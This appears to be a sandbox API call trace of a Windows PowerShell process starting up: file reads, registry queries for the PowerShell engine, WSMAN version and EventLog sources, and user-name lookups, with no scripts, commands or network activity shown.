	[0111.975] ReadFile (in: hFile=0x330, lpBuffer=0x3c360f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3c360f0*, lpNumberOfBytesRead=0xccf58*=0xe98, lpOverlapped=0x0) returned 1
	[0111.975] ReadFile (in: hFile=0x330, lpBuffer=0x3c356f0, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3c356f0*, lpNumberOfBytesRead=0xccf58*=0x0, lpOverlapped=0x0) returned 1
	[0111.975] ReadFile (in: hFile=0x330, lpBuffer=0x3c360f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3c360f0*, lpNumberOfBytesRead=0xccf58*=0x0, lpOverlapped=0x0) returned 1
	[0111.975] SetErrorMode (uMode=0x1) returned 0x1
	[0111.975] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xccf00 | out: lpFileInformation=0xccf00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0111.975] SetErrorMode (uMode=0x1) returned 0x1
	[0111.975] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfe8 | out: phkResult=0xccfe8*=0x330) returned 0x0
	[0111.976] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccf6c, lpData=0x0, lpcbData=0xccf68*=0x0 | out: lpType=0xccf6c*=0x1, lpData=0x0, lpcbData=0xccf68*=0x56) returned 0x0
	[0111.976] CoTaskMemAlloc (cb=0x5a) returned 0x1b8515b0
	[0111.976] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccf3c, lpData=0x1b8515b0, lpcbData=0xccf38*=0x56 | out: lpType=0xccf3c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xccf38*=0x56) returned 0x0
	[0111.976] CoTaskMemFree (pv=0x1b8515b0) 
	[0111.976] RegCloseKey (hKey=0x330) returned 0x0
	[0111.977] VirtualQuery (in: lpAddress=0xcba80, lpBuffer=0xcc940, dwLength=0x30 | out: lpBuffer=0xcc940*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.978] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x8465f35c, Data2=0xf918, Data3=0x40ed, Data4=([0]=0xa6, [1]=0x56, [2]=0x72, [3]=0x5c, [4]=0xc6, [5]=0xc6, [6]=0xa0, [7]=0xd3))) returned 0x0
	[0111.978] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xbe63944a, Data2=0x7bad, Data3=0x43ba, Data4=([0]=0x82, [1]=0x80, [2]=0xab, [3]=0xa4, [4]=0x8c, [5]=0x90, [6]=0xda, [7]=0x3e))) returned 0x0
	[0112.000] CoTaskMemAlloc (cb=0x104) returned 0x1b8470b0
	[0112.000] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8470b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0112.000] CoTaskMemFree (pv=0x1b8470b0) 
	[0112.000] CoTaskMemAlloc (cb=0x104) returned 0x1b8470b0
	[0112.001] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8470b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0112.001] CoTaskMemFree (pv=0x1b8470b0) 
	[0112.001] CoTaskMemAlloc (cb=0x104) returned 0x1b8470b0
	[0112.001] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8470b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0112.001] CoTaskMemFree (pv=0x1b8470b0) 
	[0112.001] CoTaskMemAlloc (cb=0x104) returned 0x1b8470b0
	[0112.001] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8470b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0112.002] CoTaskMemFree (pv=0x1b8470b0) 
	[0112.004] CoTaskMemAlloc (cb=0x104) returned 0x1b8470b0
	[0112.004] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8470b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0112.005] CoTaskMemFree (pv=0x1b8470b0) 
	[0112.005] CoTaskMemAlloc (cb=0x104) returned 0x1b8470b0
	[0112.005] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8470b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0112.005] CoTaskMemFree (pv=0x1b8470b0) 
	[0112.006] CoTaskMemAlloc (cb=0x104) returned 0x1b8470b0
	[0112.006] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8470b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0112.006] CoTaskMemFree (pv=0x1b8470b0) 
	[0112.089] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1f8 | out: phkResult=0xcd1f8*=0x330) returned 0x0
	[0112.092] RegQueryInfoKeyW (in: hKey=0x330, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xcd0fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd0f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xcd0fc*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd0f8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0112.092] CoTaskMemFree (pv=0x0) 
	[0112.092] CoTaskMemAlloc (cb=0x204) returned 0x1cf910
	[0112.092] RegEnumValueW (in: hKey=0x330, dwIndex=0x0, lpValueName=0x1cf910, lpcchValueName=0xcd1a8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0xcd1a8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0112.093] CoTaskMemFree (pv=0x1cf910) 
	[0112.093] CoTaskMemAlloc (cb=0x204) returned 0x1cf910
	[0112.093] RegEnumValueW (in: hKey=0x330, dwIndex=0x1, lpValueName=0x1cf910, lpcchValueName=0xcd1a8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0xcd1a8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0112.093] CoTaskMemFree (pv=0x1cf910) 
	[0112.093] CoTaskMemAlloc (cb=0x204) returned 0x1cf910
	[0112.093] RegEnumValueW (in: hKey=0x330, dwIndex=0x2, lpValueName=0x1cf910, lpcchValueName=0xcd1a8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0xcd1a8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0112.093] CoTaskMemFree (pv=0x1cf910) 
	[0112.094] RegQueryValueExW (in: hKey=0x330, lpValueName="StackVersion", lpReserved=0x0, lpType=0xcd18c, lpData=0x0, lpcbData=0xcd188*=0x0 | out: lpType=0xcd18c*=0x1, lpData=0x0, lpcbData=0xcd188*=0x8) returned 0x0
	[0112.094] CoTaskMemAlloc (cb=0xc) returned 0x1b84b7a0
	[0112.094] RegQueryValueExW (in: hKey=0x330, lpValueName="StackVersion", lpReserved=0x0, lpType=0xcd15c, lpData=0x1b84b7a0, lpcbData=0xcd158*=0x8 | out: lpType=0xcd15c*=0x1, lpData="2.0", lpcbData=0xcd158*=0x8) returned 0x0
	[0112.094] CoTaskMemFree (pv=0x1b84b7a0) 
	[0112.212] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd148 | out: phkResult=0xcd148*=0x304) returned 0x0
	[0112.212] RegQueryInfoKeyW (in: hKey=0x304, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xcd04c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd048, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xcd04c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd048*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0112.212] CoTaskMemFree (pv=0x0) 
	[0112.212] CoTaskMemAlloc (cb=0x204) returned 0x1cf910
	[0112.212] RegEnumValueW (in: hKey=0x304, dwIndex=0x0, lpValueName=0x1cf910, lpcchValueName=0xcd0f8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0xcd0f8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0112.212] CoTaskMemFree (pv=0x1cf910) 
	[0112.212] CoTaskMemAlloc (cb=0x204) returned 0x1cf910
	[0112.212] RegEnumValueW (in: hKey=0x304, dwIndex=0x1, lpValueName=0x1cf910, lpcchValueName=0xcd0f8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0xcd0f8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0112.213] CoTaskMemFree (pv=0x1cf910) 
	[0112.213] CoTaskMemAlloc (cb=0x204) returned 0x1cf910
	[0112.213] RegEnumValueW (in: hKey=0x304, dwIndex=0x2, lpValueName=0x1cf910, lpcchValueName=0xcd0f8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0xcd0f8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0112.213] CoTaskMemFree (pv=0x1cf910) 
	[0112.213] RegQueryValueExW (in: hKey=0x304, lpValueName="StackVersion", lpReserved=0x0, lpType=0xcd0dc, lpData=0x0, lpcbData=0xcd0d8*=0x0 | out: lpType=0xcd0dc*=0x1, lpData=0x0, lpcbData=0xcd0d8*=0x8) returned 0x0
	[0112.213] CoTaskMemAlloc (cb=0xc) returned 0x1b84b600
	[0112.213] RegQueryValueExW (in: hKey=0x304, lpValueName="StackVersion", lpReserved=0x0, lpType=0xcd0ac, lpData=0x1b84b600, lpcbData=0xcd0a8*=0x8 | out: lpType=0xcd0ac*=0x1, lpData="2.0", lpcbData=0xcd0a8*=0x8) returned 0x0
	[0112.213] CoTaskMemFree (pv=0x1b84b600) 
	[0112.215] CoTaskMemAlloc (cb=0x104) returned 0x1b8470b0
	[0112.215] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8470b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0112.215] CoTaskMemFree (pv=0x1b8470b0) 
	[0112.220] CoTaskMemAlloc (cb=0x104) returned 0x1b8470b0
	[0112.220] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8470b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0112.220] CoTaskMemFree (pv=0x1b8470b0) 
	[0112.226] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd178 | out: phkResult=0xcd178*=0x308) returned 0x0
	[0112.240] RegQueryInfoKeyW (in: hKey=0x308, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xcd0ec, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd0e8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xcd0ec*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd0e8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0112.240] CoTaskMemFree (pv=0x0) 
	[0112.241] CoTaskMemAlloc (cb=0x204) returned 0x1cf910
	[0112.241] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x0, lpName=0x1cf910, lpcchName=0xcd178, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xcd178, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0112.241] CoTaskMemFree (pv=0x1cf910) 
	[0112.241] CoTaskMemFree (pv=0x0) 
	[0112.241] CoTaskMemAlloc (cb=0x204) returned 0x1cf910
	[0112.241] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x1, lpName=0x1cf910, lpcchName=0xcd178, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xcd178, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0112.241] CoTaskMemFree (pv=0x1cf910) 
	[0112.241] CoTaskMemFree (pv=0x0) 
	[0112.241] CoTaskMemAlloc (cb=0x204) returned 0x1cf910
	[0112.242] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x2, lpName=0x1cf910, lpcchName=0xcd178, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xcd178, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0112.242] CoTaskMemFree (pv=0x1cf910) 
	[0112.242] CoTaskMemFree (pv=0x0) 
	[0112.242] CoTaskMemAlloc (cb=0x204) returned 0x1cf910
	[0112.242] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x3, lpName=0x1cf910, lpcchName=0xcd178, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xcd178, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0112.242] CoTaskMemFree (pv=0x1cf910) 
	[0112.242] CoTaskMemFree (pv=0x0) 
	[0112.242] CoTaskMemAlloc (cb=0x204) returned 0x1cf910
	[0112.242] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x4, lpName=0x1cf910, lpcchName=0xcd178, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xcd178, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0112.242] CoTaskMemFree (pv=0x1cf910) 
	[0112.242] CoTaskMemFree (pv=0x0) 
	[0112.242] CoTaskMemAlloc (cb=0x204) returned 0x1cf910
	[0112.242] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x5, lpName=0x1cf910, lpcchName=0xcd178, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xcd178, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0112.242] CoTaskMemFree (pv=0x1cf910) 
	[0112.242] CoTaskMemFree (pv=0x0) 
	[0112.242] CoTaskMemAlloc (cb=0x204) returned 0x1cf910
	[0112.242] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x6, lpName=0x1cf910, lpcchName=0xcd178, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xcd178, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0112.242] CoTaskMemFree (pv=0x1cf910) 
	[0112.242] CoTaskMemFree (pv=0x0) 
	[0112.242] CoTaskMemAlloc (cb=0x204) returned 0x1cf910
	[0112.242] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x7, lpName=0x1cf910, lpcchName=0xcd178, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xcd178, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0112.242] CoTaskMemFree (pv=0x1cf910) 
	[0112.242] CoTaskMemFree (pv=0x0) 
	[0112.243] CoTaskMemAlloc (cb=0x204) returned 0x1cf910
	[0112.243] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x8, lpName=0x1cf910, lpcchName=0xcd178, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xcd178, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0112.243] CoTaskMemFree (pv=0x1cf910) 
	[0112.243] CoTaskMemFree (pv=0x0) 
	[0112.243] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1d8 | out: phkResult=0xcd1d8*=0x30c) returned 0x0
	[0112.243] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1d8 | out: phkResult=0xcd1d8*=0x0) returned 0x2
	[0112.243] RegOpenKeyExW (in: hKey=0x308, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1d8 | out: phkResult=0xcd1d8*=0x320) returned 0x0
	[0112.243] RegOpenKeyExW (in: hKey=0x320, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1d8 | out: phkResult=0xcd1d8*=0x0) returned 0x2
	[0112.243] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1d8 | out: phkResult=0xcd1d8*=0x338) returned 0x0
	[0112.243] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1d8 | out: phkResult=0xcd1d8*=0x0) returned 0x2
	[0112.243] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1d8 | out: phkResult=0xcd1d8*=0x33c) returned 0x0
	[0112.244] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1d8 | out: phkResult=0xcd1d8*=0x0) returned 0x2
	[0112.244] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1d8 | out: phkResult=0xcd1d8*=0x340) returned 0x0
	[0112.244] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1d8 | out: phkResult=0xcd1d8*=0x0) returned 0x2
	[0112.244] RegOpenKeyExW (in: hKey=0x308, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1d8 | out: phkResult=0xcd1d8*=0x344) returned 0x0
	[0112.244] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1d8 | out: phkResult=0xcd1d8*=0x0) returned 0x2
	[0112.244] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1d8 | out: phkResult=0xcd1d8*=0x348) returned 0x0
	[0112.244] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1d8 | out: phkResult=0xcd1d8*=0x0) returned 0x2
	[0112.244] RegOpenKeyExW (in: hKey=0x308, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1d8 | out: phkResult=0xcd1d8*=0x34c) returned 0x0
	[0112.244] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1d8 | out: phkResult=0xcd1d8*=0x0) returned 0x2
	[0112.245] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1d8 | out: phkResult=0xcd1d8*=0x350) returned 0x0
	[0112.245] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1d8 | out: phkResult=0xcd1d8*=0x354) returned 0x0
	[0112.245] RegCloseKey (hKey=0x354) returned 0x0
	[0112.245] RegCloseKey (hKey=0x308) returned 0x0
	[0112.246] RegCloseKey (hKey=0x350) returned 0x0
	[0112.264] CoTaskMemAlloc (cb=0x804) returned 0x1b8630d0
	[0112.264] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8630d0, nSize=0xcd3e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd3e8) returned 0x1
	[0112.265] CoTaskMemFree (pv=0x1b8630d0) 
	[0112.266] CoTaskMemAlloc (cb=0x204) returned 0x1cf910
	[0112.266] GetUserNameW (in: lpBuffer=0x1cf910, pcbBuffer=0xcd428 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd428) returned 1
	[0112.267] CoTaskMemFree (pv=0x1cf910) 
	[0112.318] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd128 | out: phkResult=0xcd128*=0x358) returned 0x0
	[0112.318] RegQueryInfoKeyW (in: hKey=0x358, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xcd09c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd098, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xcd09c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd098*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0112.318] CoTaskMemFree (pv=0x0) 
	[0112.318] CoTaskMemAlloc (cb=0x204) returned 0x1cf910
	[0112.318] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x0, lpName=0x1cf910, lpcchName=0xcd128, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xcd128, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0112.318] CoTaskMemFree (pv=0x1cf910) 
	[0112.318] CoTaskMemFree (pv=0x0) 
	[0112.318] CoTaskMemAlloc (cb=0x204) returned 0x1cf910
	[0112.318] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x1, lpName=0x1cf910, lpcchName=0xcd128, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xcd128, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0112.318] CoTaskMemFree (pv=0x1cf910) 
	[0112.318] CoTaskMemFree (pv=0x0) 
	[0112.318] CoTaskMemAlloc (cb=0x204) returned 0x1cf910
	[0112.318] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x2, lpName=0x1cf910, lpcchName=0xcd128, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xcd128, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0112.318] CoTaskMemFree (pv=0x1cf910) 
	[0112.318] CoTaskMemFree (pv=0x0) 
	[0112.318] CoTaskMemAlloc (cb=0x204) returned 0x1cf910
	[0112.318] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x3, lpName=0x1cf910, lpcchName=0xcd128, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xcd128, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0112.318] CoTaskMemFree (pv=0x1cf910) 
	[0112.318] CoTaskMemFree (pv=0x0) 
	[0112.318] CoTaskMemAlloc (cb=0x204) returned 0x1cf910
	[0112.318] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x4, lpName=0x1cf910, lpcchName=0xcd128, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xcd128, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0112.318] CoTaskMemFree (pv=0x1cf910) 
	[0112.318] CoTaskMemFree (pv=0x0) 
	[0112.318] CoTaskMemAlloc (cb=0x204) returned 0x1cf910
	[0112.319] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x5, lpName=0x1cf910, lpcchName=0xcd128, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xcd128, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0112.319] CoTaskMemFree (pv=0x1cf910) 
	[0112.319] CoTaskMemFree (pv=0x0) 
	[0112.319] CoTaskMemAlloc (cb=0x204) returned 0x1cf910
	[0112.319] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x6, lpName=0x1cf910, lpcchName=0xcd128, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xcd128, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0112.319] CoTaskMemFree (pv=0x1cf910) 
	[0112.319] CoTaskMemFree (pv=0x0) 
	[0112.319] CoTaskMemAlloc (cb=0x204) returned 0x1cf910
	[0112.319] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x7, lpName=0x1cf910, lpcchName=0xcd128, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xcd128, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0112.319] CoTaskMemFree (pv=0x1cf910) 
	[0112.319] CoTaskMemFree (pv=0x0) 
	[0112.319] CoTaskMemAlloc (cb=0x204) returned 0x1cf910
	[0112.319] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x8, lpName=0x1cf910, lpcchName=0xcd128, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xcd128, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0112.319] CoTaskMemFree (pv=0x1cf910) 
	[0112.319] CoTaskMemFree (pv=0x0) 
	[0112.319] RegOpenKeyExW (in: hKey=0x358, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd188 | out: phkResult=0xcd188*=0x35c) returned 0x0
	[0112.319] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd188 | out: phkResult=0xcd188*=0x0) returned 0x2
	[0112.320] RegOpenKeyExW (in: hKey=0x358, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd188 | out: phkResult=0xcd188*=0x360) returned 0x0
	[0112.320] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd188 | out: phkResult=0xcd188*=0x0) returned 0x2
	[0112.320] RegOpenKeyExW (in: hKey=0x358, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd188 | out: phkResult=0xcd188*=0x364) returned 0x0
	[0112.320] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd188 | out: phkResult=0xcd188*=0x0) returned 0x2
